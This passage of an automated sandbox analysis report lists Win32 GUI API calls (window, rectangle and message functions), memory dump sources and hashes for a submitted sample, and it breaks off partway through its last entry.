                                                                  • Instruction Fuzzy Hash: 0B51AF31A102068BDF00EFB4C942BEE77F6AF64300F144169E915EB291DF709E51CBA4
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 001F39AF
                                                                  • GetWindowRect.USER32(?,?), ref: 001F39D1
                                                                  • GetClientRect.USER32(?,?), ref: 001F3A61
                                                                  • MapWindowPoints.USER32(?,?,?,00000002), ref: 001F3A74
                                                                  • FillRect.USER32(?,?), ref: 001F3AB4
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$ClientFillParentPoints
                                                                  • String ID:
                                                                  • API String ID: 1064458942-0
                                                                  • Opcode ID: d76a65eb02df797beda5367d96a5f6395c80bc1a44e8bb4744802a6d8e77c9b5
                                                                  • Instruction ID: 02010a795cf93a9ebede5f1412f8d9023ec6376fbf349018d9425950b84edefa
                                                                  • Opcode Fuzzy Hash: d76a65eb02df797beda5367d96a5f6395c80bc1a44e8bb4744802a6d8e77c9b5
                                                                  • Instruction Fuzzy Hash: 49514971A00219EFCB15DFA9D8889BEBBB9FF48700B14446AF956E7211D7709E40CFA0
                                                                  APIs
                                                                  • IsWindow.USER32(00000000), ref: 002012B5
                                                                  • ShowWindow.USER32(00000000,00000004), ref: 002012E7
                                                                  • IsWindow.USER32(?), ref: 0020132C
                                                                  • IsWindowVisible.USER32(?), ref: 00201337
                                                                  • ShowWindow.USER32(?,00000000), ref: 00201372
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Show$Visible
                                                                  • String ID:
                                                                  • API String ID: 2757229004-0
                                                                  • Opcode ID: 5b436a8a47fc6d4f9f187f54dd441d21e71bacb1ad8a0e1e1adacaed1e3837ef
                                                                  • Instruction ID: 70f03ff2e0f911c66c4255cc31fe1e0214833fd2e76c704ab08393d840213497
                                                                  • Opcode Fuzzy Hash: 5b436a8a47fc6d4f9f187f54dd441d21e71bacb1ad8a0e1e1adacaed1e3837ef
                                                                  • Instruction Fuzzy Hash: 8141C231620306AFDB14AFA1D885FAB77ADAF54750F144069FD49DB6C2DB70E860CBA0
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 0020EE10
                                                                    • Part of subcall function 001D015C: ClientToScreen.USER32(?,?), ref: 001D016D
                                                                    • Part of subcall function 001D015C: ClientToScreen.USER32(?,?), ref: 001D017A
                                                                  • PtInRect.USER32(?,?,?), ref: 0020EE2A
                                                                  • PtInRect.USER32(?,?,?), ref: 0020EE9D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ClientRect$Screen
                                                                  • String ID:
                                                                  • API String ID: 3187875807-0
                                                                  • Opcode ID: 9e1be42f94ec354f027b705b1c62a83d97ada7d13ff4c6b6b986bc0a225e7b6b
                                                                  • Instruction ID: ba7fae2798f9d5d18caf1c54db8b784a824ac4de97cb870fe8b4e28e1b16d5f2
                                                                  • Opcode Fuzzy Hash: 9e1be42f94ec354f027b705b1c62a83d97ada7d13ff4c6b6b986bc0a225e7b6b
                                                                  • Instruction Fuzzy Hash: 3D411F7191064BEFCF11DFA4D988AAEBBF5EF08310F114829E406FB281D771AA51DB51
                                                                  APIs
                                                                    • Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09
                                                                  • GetWindowRect.USER32(?,0020CC3A), ref: 0024F697
                                                                  • GetSystemMetrics.USER32(00000021), ref: 0024F6A5
                                                                  • GetSystemMetrics.USER32(00000020), ref: 0024F6AB
                                                                  • GetKeyState.USER32(00000002), ref: 0024F6CB
                                                                  • InflateRect.USER32(0020CC3A,00000000,00000000), ref: 0024F701
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsRectSystemWindow$InflateLongState
                                                                  • String ID:
                                                                  • API String ID: 2406722796-0
                                                                  • Opcode ID: 9b3257bb9aaf8bd72865d5aa88e3d418551c1f6abc12837353791137cdc9d042
                                                                  • Instruction ID: 00a9858c7fc1a46e257ce6644b196cfc49a7db069afecd2fd7454a96b066b873
                                                                  • Opcode Fuzzy Hash: 9b3257bb9aaf8bd72865d5aa88e3d418551c1f6abc12837353791137cdc9d042
                                                                  • Instruction Fuzzy Hash: FD31E932A2010A9BDB58DF78DA89ABEF7F8EFC4390F15443AD406EB150DA789950CB50
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 002A199E
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000105,0000005C,002A1C62,?,002A1D9B,?,?,?,00224C84,00000004,?,00000001,?), ref: 002A19C3
                                                                  • GetClientRect.USER32(?,?), ref: 002A19E1
                                                                  • CreateCompatibleDC.GDI32(002A1D9B), ref: 002A1A49
                                                                  • UpdateLayeredWindow.USER32(?,00000000,00000000,?,?,?,00000000), ref: 002A1AA9
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientCompatibleCreateH_prolog3_LayeredRectRedrawUpdate
                                                                  • String ID:
                                                                  • API String ID: 2227077885-0
                                                                  • Opcode ID: d4d60545fab65c0553ab04b8d2b998201e580bc7379ee712ca731eaffd1b0350
                                                                  • Instruction ID: ec53a0444b3152745039a8d3b5c0ed85f249a53667effe53d44de80686d3af3f
                                                                  • Opcode Fuzzy Hash: d4d60545fab65c0553ab04b8d2b998201e580bc7379ee712ca731eaffd1b0350
                                                                  • Instruction Fuzzy Hash: AC410271C01228AFCF02EFE4C985ADEBFB9AF19710F10415AE846B6252CB705A15CFA0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ClientCursorScreen$Rect
                                                                  • String ID:
                                                                  • API String ID: 1082406499-0
                                                                  • Opcode ID: d51332b12ea9b284467208ed23d37bdbfc636418e15bee3d007156dd503043aa
                                                                  • Instruction ID: 54ec05d7d7a9aafa82d5a9e20880f81945046bf253f60427386a1e458b4780ed
                                                                  • Opcode Fuzzy Hash: d51332b12ea9b284467208ed23d37bdbfc636418e15bee3d007156dd503043aa
                                                                  • Instruction Fuzzy Hash: E4315975A00649DFCB10EFB6D8C49AEBBF9FB08300F10452AE516A3291DB34A941CF60
                                                                  APIs
                                                                  • CallNextHookEx.USER32(00000000,?,?), ref: 001EBEB1
                                                                  • WindowFromPoint.USER32(?,?), ref: 001EBEDC
                                                                  • ScreenToClient.USER32(?,00000000), ref: 001EBF0D
                                                                  • GetParent.USER32(?), ref: 001EBF7B
                                                                  • UpdateWindow.USER32(?), ref: 001EBFD3
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallClientFromHookNextParentPointScreenUpdate
                                                                  • String ID:
                                                                  • API String ID: 160110263-0
                                                                  • Opcode ID: 169510084bfc4c7d818c64f5b91cd5d5160c7ca581fe5c32f84e2d5282649644
                                                                  • Instruction ID: 02ec8b35abbad073db16fd3c709d9aa0bd735d5b04ccea2dc39b30726bc67742
                                                                  • Opcode Fuzzy Hash: 169510084bfc4c7d818c64f5b91cd5d5160c7ca581fe5c32f84e2d5282649644
                                                                  • Instruction Fuzzy Hash: 0F316B39608A40AFCB169FA5EC89FAE7BB9FB58360F15416DF5198B261DB31D800CF50
                                                                  APIs
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 001F0B4D
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 001F0B7C
                                                                  • InflateRect.USER32(?,?,?), ref: 001F0BDE
                                                                  • InflateRect.USER32(?,00000001,00000001), ref: 001F0BFA
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: InflateRect
                                                                  • String ID:
                                                                  • API String ID: 2073123975-0
                                                                  • Opcode ID: 4d65632df4401f98ad7f42b6bdb3f259e2242b83391da2d142966eb7953d6925
                                                                  • Instruction ID: e4f882e7f7683915f3cbefa4a8f32476176a6c4e1dde6d87e017e8849d2ee695
                                                                  • Opcode Fuzzy Hash: 4d65632df4401f98ad7f42b6bdb3f259e2242b83391da2d142966eb7953d6925
                                                                  • Instruction Fuzzy Hash: 08315072600249BBCF02DF95DC84DBB77ADFB48324F144616F625D72E2DA34EA118B60
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 0020E10B
                                                                    • Part of subcall function 001DCC18: GetWindowLongW.USER32(?,000000EC), ref: 001DCC23
                                                                  • OffsetRect.USER32(?,?,00000000), ref: 0020E166
                                                                  • UnionRect.USER32(?,?,?), ref: 0020E184
                                                                  • EqualRect.USER32(?,?), ref: 0020E192
                                                                  • UpdateWindow.USER32(?), ref: 0020E1CE
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$EqualLongOffsetUnionUpdate
                                                                  • String ID:
                                                                  • API String ID: 4261707372-0
                                                                  • Opcode ID: 219f0728e1b50006d7309f015ab054b50ff96971ef20625827afecea8db227ac
                                                                  • Instruction ID: 560d310667d5ac231883009bf9f4445b6fbabf454e067dccc28c1f7b5fa54191
                                                                  • Opcode Fuzzy Hash: 219f0728e1b50006d7309f015ab054b50ff96971ef20625827afecea8db227ac
                                                                  • Instruction Fuzzy Hash: 5E312AB1901309DFCB10DFA9D9849EEFBF9BB48310F114A2EE55AE2251CB30A940DF50
                                                                  APIs
                                                                    • Part of subcall function 0020B291: GetParent.USER32(?), ref: 0020B29D
                                                                    • Part of subcall function 0020B291: GetParent.USER32(00000000), ref: 0020B2A0
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0020BB34
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000081,?,?,?,?,?,0020BEE0,00000000), ref: 0020BB85
                                                                  • SetWindowLongW.USER32(?,000000EC,?), ref: 0020BB94
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000137,?,?,?,?,?,0020BEE0,00000000), ref: 0020BBAA
                                                                  • GetClientRect.USER32(?,?), ref: 0020BBBE
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$LongParent$ClientRectRedraw
                                                                  • String ID:
                                                                  • API String ID: 556606033-0
                                                                  • Opcode ID: 9453e879a8d938af54c135ec3190dbe859384100ae6e3dbe6a816a42d5955a88
                                                                  • Instruction ID: 5fc18a57e794e146eee538696c1132e911c6bb2d3a0ddf3a4d5f06ddf545ad7b
                                                                  • Opcode Fuzzy Hash: 9453e879a8d938af54c135ec3190dbe859384100ae6e3dbe6a816a42d5955a88
                                                                  • Instruction Fuzzy Hash: 2C212332A20305AFDB33AF70CCC9DAE76A9EB80358F100939F916A71E6DB309D51C610
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 001CE503
                                                                  • CreateRectRgnIndirect.GDI32(?), ref: 001CE525
                                                                    • Part of subcall function 001D0090: SelectClipRgn.GDI32(?,00000000), ref: 001D00B6
                                                                    • Part of subcall function 001D0090: SelectClipRgn.GDI32(?,?), ref: 001D00CC
                                                                  • GetParent.USER32(?), ref: 001CE545
                                                                  • MapWindowPoints.USER32(?,00000000,?,00000001), ref: 001CE59D
                                                                  • SendMessageW.USER32(?,00000014,?,00000000), ref: 001CE5CA
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ClipSelect$CreateH_prolog3IndirectMessageParentPointsRectSendWindow
                                                                  • String ID:
                                                                  • API String ID: 3362736716-0
                                                                  • Opcode ID: bb7760aa55b7d9627ec9d2b56579f9e24089a29e0e8d93535d2c2ae71993afc9
                                                                  • Instruction ID: 61d1c09c9882eedd3d09e11563057186f0e77da5805b93aabaf1ee566f29fb2f
                                                                  • Opcode Fuzzy Hash: bb7760aa55b7d9627ec9d2b56579f9e24089a29e0e8d93535d2c2ae71993afc9
                                                                  • Instruction Fuzzy Hash: 90310D75A0021A9FCF14DFA4D945EAEB7B5FF18300F144529F915AB251EB70DE11CBA0
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 001FC5B0
                                                                  • SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 001FC5CC
                                                                  • SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 001FC60F
                                                                    • Part of subcall function 0024C679: SendMessageW.USER32(?,00000433,00000000,?), ref: 0024C6AC
                                                                  • SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 001FC5FA
                                                                  • SetRectEmpty.USER32(?), ref: 001FC62F
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$EmptyRect
                                                                  • String ID:
                                                                  • API String ID: 4004678023-0
                                                                  • Opcode ID: 679a4a853c7a7c6138d42266f2541e0147f9d722543f61639524e3ee49529e49
                                                                  • Instruction ID: 6333513974dabc22c6fdfd8b4675ddde264140d4c2830e9f07912c4ef7ca8740
                                                                  • Opcode Fuzzy Hash: 679a4a853c7a7c6138d42266f2541e0147f9d722543f61639524e3ee49529e49
                                                                  • Instruction Fuzzy Hash: 3F312CB1A0420DAFDB14DF68CD82EFEBBF9EB48310F110569E255E7250DA70AD419B90
                                                                  APIs
                                                                    • Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09
                                                                    • Part of subcall function 0020B291: GetParent.USER32(?), ref: 0020B29D
                                                                    • Part of subcall function 0020B291: GetParent.USER32(00000000), ref: 0020B2A0
                                                                  • SendMessageW.USER32(?,00000234,00000000,00000000), ref: 0020BD43
                                                                  • SendMessageW.USER32(?,00000229,00000000,00000000), ref: 0020BD6A
                                                                  • SendMessageW.USER32(?,00000229,00000000,00000000), ref: 0020BD87
                                                                  • SendMessageW.USER32(?,00000222,?,00000000), ref: 0020BD9E
                                                                  • SendMessageW.USER32(?,00000222,00000000,?), ref: 0020BDC3
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Parent$LongWindow
                                                                  • String ID:
                                                                  • API String ID: 4191550487-0
                                                                  • Opcode ID: c2f562af150b25bc431fa66d480edb7f0fa559ce9beb7277094c7778a03443dc
                                                                  • Instruction ID: 1cbf0744190adce8258a323690bf33d3b7aac5bb6ed1511add54bb47653c6a1e
                                                                  • Opcode Fuzzy Hash: c2f562af150b25bc431fa66d480edb7f0fa559ce9beb7277094c7778a03443dc
                                                                  • Instruction Fuzzy Hash: 6B21E53173030A7BDB3A6F20CC47BBDA615EF58311F14082AF615AA1D3DBB1AC609A90
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 002199C0
                                                                  • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 002199F3
                                                                  • GetWindowRect.USER32(?,?), ref: 00219A02
                                                                  • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00219A58
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 00219A6A
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSend$RectRedrawVisible
                                                                  • String ID:
                                                                  • API String ID: 1695962874-0
                                                                  • Opcode ID: 375e9f31aa297e23325a66409aa5f26a2b2759403c35df6b0dbe4efe01cc5ab0
                                                                  • Instruction ID: 48aad15de72fd176ab4cdc1235502ea07d99ad14e947759b1fedbbc19c786c0a
                                                                  • Opcode Fuzzy Hash: 375e9f31aa297e23325a66409aa5f26a2b2759403c35df6b0dbe4efe01cc5ab0
